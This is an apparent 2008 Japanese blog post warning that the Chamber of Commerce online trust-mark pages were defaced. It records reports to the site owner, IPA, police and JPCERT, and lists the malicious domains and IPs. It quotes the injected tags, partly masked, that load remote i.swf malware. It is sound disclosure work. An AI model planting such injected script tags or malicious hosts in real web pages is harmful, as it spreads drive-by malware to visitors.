security-literacy

日本商工会議所オンラインマーク総合センター
　http://mark.cin.or.jp/
のオンラインマークが改ざんされており、
ページに不正なスクリプトが埋め込まれています。
マーク使用許可事業者の「オンラインマークの認証関係情報」
　商工会議所オンラインマーク地域センターへのリンク中および地域センターの所在地の右端に挿入されています。
ユーザーのシステムに脆弱性があると、このコードによって実行可能ファイルが実行され、マルウェアがダウンロードされるかもしれません。オンラインマークは絶対にクリックしないで下さい。
2008-10-05 7 p.m.

ホームページの不正アクセスと改竄について下記へ連絡しました。

日本商工会議所オンラインマーク総合センター
　　メール連絡済　（第一報　Sun, 05 Oct 2008 12:05:51 +0900）
　　電話連絡済

情報処理推進機構（IPA）セキュリティセンター（ISEC）
　http://www.ipa.go.jp/security/ciadr/index.html
　　留守電メッセージ済
　　メール連絡済 (受理 2008-10-06 ca 3 p.m.）

都道府県警察本部のサイバー犯罪相談窓口
　http://www.npa.go.jp/cyber/soudan.htm
　　警視庁　　長時間電話中で連絡不可
　　地元警察本部　電話で情報提供済

JPCERTコーディネーションセンター（JPCERT/CC）
　http://www.jpcert.or.jp/
　　メール連絡済（受理 2008-10-06 11 a.m.）

[調査結果]
日本商工会議所オンラインマーク総合センター
オンラインマークの改ざんにより不正に挿入されているドメイン名
2008-10-07時点で、赤矢印の位置の"水平線"は表示されなくなりましたが、不正スクリプトは存在します。

drmyy.cn　（2008-10-05 4 p.m. 時点の対応グロ－バルIP 211.154.163.43）
　http://safeweb.norton.com/report/show?url=drmyy.cn&x=0&y=0
　http://www.siteadvisor.com/sites/drmyy.cn/summary/

日本商工会議所オンラインマーク総合センターのサイト要素
に含まれていると思われるIPアドレス
　　ブラウザ Google Chrome (現時点での最新バージョン 0.2.149.30) BETAによる警告メッセージより

125.68.57.154　（2008-10-05 4 p.m. 時点の対応ドメイン ytgw123.cn）
　http://safeweb.norton.com/report/show?url=ytgw123.cn&x=0&y=0
　http://www.siteadvisor.com/sites/ytgw123.cn

[追記 2008-10-06]
地元の商工会議所へ電話連絡済

オンラインマークの認証関係情報
　http:／／mark.cin.or.jp/database/cert-plug-inst.asp?markid=A00000-＊-＊＊
2008-10-06 10 p.m. 時点で未対応です。

[追記 2008-10-07]
不正スクリプトは削除されていません。
存在場所を示す"水平線"が表示されないように、サーバ内部で「改悪」処理が行われています。ブラウザで見た人は、不正スクリプトの要素に全く気づきません。
参照ページ：
「SQLインジェクションの仕組み――Webサイトに悪質コードを埋め込む」
　http://itpro.nikkeibp.co.jp/article/COLUMN/20080930/315826/

改ざんの前後でWebサイトの外見が変化することはほとんどない。そのため，エンドユーザーが一見して改ざんに気づくことは難しい。
例外的に，HTML出力時にデータを（投稿者注：改ざん防止対策として）エスケープ処理していたり，タイトル・タグとなるデータが改ざんされたりした場合は，〈script src=http:／／www.example.com/ngg.js〉〈／script〉といったタグが文字列としてWebサイトに表示されることがある。

不正スクリプトは削除されました。9 p.m.

【急　告】再び、サーバ乗っ取り？によるオンライン認証関連情報ページの改ざん発見
2008-11-23 午前１時
閲覧者アクセスや検索ロボットの不正サイト登録を予防するため、一部***に変更しました。

【認証機関】日本<script src=ｈｔｔｐ://61.31.***.114/i.swf></script><script src=ｈｔｔｐ://****.co.kr/i.swf></script><script src=ｈｔｔｐ://****.co.kr/i.swf></script>商工会議所オンラインマーク地域センター<br>〒100-0005　千代田区丸の内３－２－２<script src=ｈｔｔｐ://61.31.***.114/i.swf></script><script src=ｈｔｔｐ://****.co.kr/i.swf></script><script src=ｈｔｔｐ://****.co.kr/i.swf></script>

同様の手口ですが、誘導するサイトが前回と異なります。

t**-n**　（2008-11-23 9 a.m. 時点の対応グロ－バルIP 61.31.235.114）
Viruses Severity: High
　http://safeweb.norton.com/report/show?url=61.31.235.114&x=0&y=0
　http://www.siteadvisor.com/sites/61.31.235.114/summary/

ipkn.co.kr/i.swf　（2008-11-23 9 a.m. 時点の対応グロ－バルIP 211.***.62.32）
　http://safeweb.norton.com/report/show?url=ipkn.co.kri/
　http://www.siteadvisor.com/sites/ipkn.co.kri/

　　ブラウザ Google Chrome (現時点での最新バージョン 0.3.154.9) BETAによる警告メッセージより

[追記 2008-11-27] 本日 10 a.m. 当該ページの不正スクリプト削除済確認